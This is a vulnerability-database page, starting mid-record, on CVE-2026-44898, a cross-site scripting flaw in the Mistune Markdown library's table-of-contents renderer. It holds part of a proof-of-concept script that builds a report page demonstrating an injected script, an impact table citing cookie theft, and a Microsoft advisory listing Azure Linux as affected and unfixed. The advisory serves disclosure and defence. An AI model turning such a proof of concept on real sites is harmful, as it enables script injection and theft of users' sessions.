class=\"panel\"\u003e\n      \u003ch3\u003eTOC output \u2014 HTML source\u003c/h3\u003e\n      \u003cpre\u003e{h.escape(out)}\u003c/pre\u003e\n      \u003cdiv class=\"rlabel\"\u003e\u2193 rendered in browser\u003c/div\u003e\n      \u003cdiv class=\"rendered\"\u003e{out}\u003c/div\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\u003c/div\u003e\"\"\"\n\npage = f\"\"\"\u003c!DOCTYPE html\u003e\u003chtml lang=\"en\"\u003e\u003chead\u003e\u003cmeta charset=\"UTF-8\"\u003e\n\u003ctitle\u003eH4 \u2014 TOC XSS\u003c/title\u003e\u003cstyle\u003e{CSS}\u003c/style\u003e\u003c/head\u003e\u003cbody\u003e\n\u003ch1\u003eH4 \u2014 TOC render_toc_ul() XSS\u003c/h1\u003e\n\u003cp class=\"desc\"\u003erender_toc_ul() in toc.py uses \u0027\u0026lt;a href=\"#{{}}\"\u0026gt;{{}}\u0026lt;/a\u0026gt;\u0027.format(k, text) \u2014\nneither k (the heading ID) nor text is escaped before insertion.\u003c/p\u003e\n{case(\"baseline\", \"Normal headings \u2192 sequential IDs \u2192 clean TOC links\", bl_file, bl_src, bl_out)}\n{case(\"exploit\",  \"Malicious heading ID breaks out of href=\u0027#...\u0027 \u2192 script injected\", ex_file, ex_src, ex_out)}\n\u003c/body\u003e\u003c/html\u003e\"\"\"\n\nout_path = os.path.join(os.getcwd(), \"report_h4.html\")\nwith open(out_path, \"w\") as f:\n    f.write(page)\nprint(f\"\\n[report] {out_path}\")\n```\n\nExample usage:\n```bash\npython poc.py\n```\n\nOnce you run the script, open `report_h4.html` in the browser and observe the behaviour.\n\n## Impact\n| Dimension        | Assessment |\n|------------------|-----------|\n| **Confidentiality** | JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page\u0027s origin |\n| **Integrity**    | Arbitrary DOM manipulation, phishing form injection, forced redirects |\n| **Availability** | Page crash or freeze available as secondary effect |\n\n**Risk context:** TOC generation is a rendering step that often happens in a different template layer from the main body render, potentially reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor.",
  "id": "GHSA-6269-cqxg-mhhv",
  "modified": "2026-05-14T16:36:12Z",
  "published": "2026-05-14T16:36:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lepture/mistune/security/advisories/GHSA-6269-cqxg-mhhv"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lepture/mistune/commit/04880a0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lepture/mistune"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lepture/mistune/releases/tag/v3.2.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mistune TOC Anchor Injection XSS"
}

MSRC_CVE-2026-44898

Vulnerability from csaf_microsoft - Published: 2026-05-02 00:00 - Updated: 2026-05-28 01:06

Summary

Mistune TOC Anchor Injection XSS

Notes

Additional Resources: To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle

Disclaimer: The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2026-44898

6.1 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Affected products

Known affected 1 product

Product	Identifier	Version	Remediation
Unresolved product id: 17084-1		—	None Available

References

4 references

URL	Category
https://msrc.microsoft.com/csaf/vex/2026/msrc_cve…	self
https://support.microsoft.com/lifecycle	external
https://www.first.org/cvss	external
https://msrc.microsoft.com/csaf/vex/2026/msrc_cve…	self

JSON

To clipboard

{
  "document": {
    "category": "csaf_vex",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Public",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en-US",
    "notes": [
      {
        "category": "general",
        "text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
        "title": "Additional Resources"
      },
      {
        "category": "legal_disclaimer",
        "text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
        "title": "Disclaimer"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "secure@microsoft.com",
      "name": "Microsoft Security Response Center",
      "namespace": "https://msrc.microsoft.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "CVE-2026-44898 Mistune TOC Anchor Injection XSS - VEX",
        "url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-44898.json"
      },
      {
        "category": "external",
        "summary": "Microsoft Support Lifecycle",
        "url": "https://support.microsoft.com/lifecycle"
      },
      {
        "category": "external",
        "summary": "Common Vulnerability Scoring System",
        "url": "https://www.first.org/cvss"
      }
    ],
    "title": "Mistune TOC Anchor Injection XSS",
    "tracking": {
      "current_release_date": "2026-05-28T01:06:34.000Z",
      "generator": {
        "date": "2026-05-28T07:20:09.808Z",
        "engine": {
          "name": "MSRC Generator",
          "version": "1.0"
        }
      },
      "id": "msrc_CVE-2026-44898",
      "initial_release_date": "2026-05-02T00:00:00.000Z",
      "revision_history": [
        {
          "date": "2026-05-28T01:06:34.000Z",
          "legacy_version": "1",
          "number": "1",
          "summary": "Information published."
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "3.0",
                "product": {
                  "name": "Azure Linux 3.0",
                  "product_id": "17084"
                }
              }
            ],
            "category": "product_name",
            "name": "Azure Linux"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "azl3 python-mistune 0:3.0.2-1.azl3",
                "product": {
                  "name": "azl3 python-mistune 0:3.0.2-1.azl3",
                  "product_id": "1"
                }
              }
            ],
            "category": "product_name",
            "name": "python-mistune"
          }
        ],
        "category": "vendor",
        "name": "Microsoft"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "azl3 python-mistune 0:3.0.2-1.azl3 as a component of Azure Linux 3.0",
          "product_id": "17084-1"
        },
        "product_reference": "1",
        "relates_to_product_reference": "17084"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-44898",
      "cwe": {
        "id": "CWE-79",
        "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
      },
      "notes": [
        {
          "category": "general",
          "text": "GitHub_M",
          "title": "Assigning CNA"
        }
      ],
      "product_status": {
        "known_affected": [
          "17084-1"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2026-44898 Mistune TOC Anchor Injection XSS - VEX",
          "url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-44898.json"
        }
      ],
      "remediations": [
        {
          "category": "none_available",
          "date": "2026-05-28T01:06:34.000Z",
          "details": "There is no fix available for this vulnerability as of now",
          "product_ids": [
            "17084-1"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "environmentalsScore": 0.0,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "temporalScore": 6.1,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "17084-1"
          ]
        }
      ],
      "title": "Mistune TOC Anchor Injection XSS"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44898 (GCVE-0-2026-44898)

FKIE_CVE-2026-44898

GHSA-6269-CQXG-MHHV

Summary

Details

PoC

Script

Impact

MSRC_CVE-2026-44898

Tags

Sightings

Nomenclature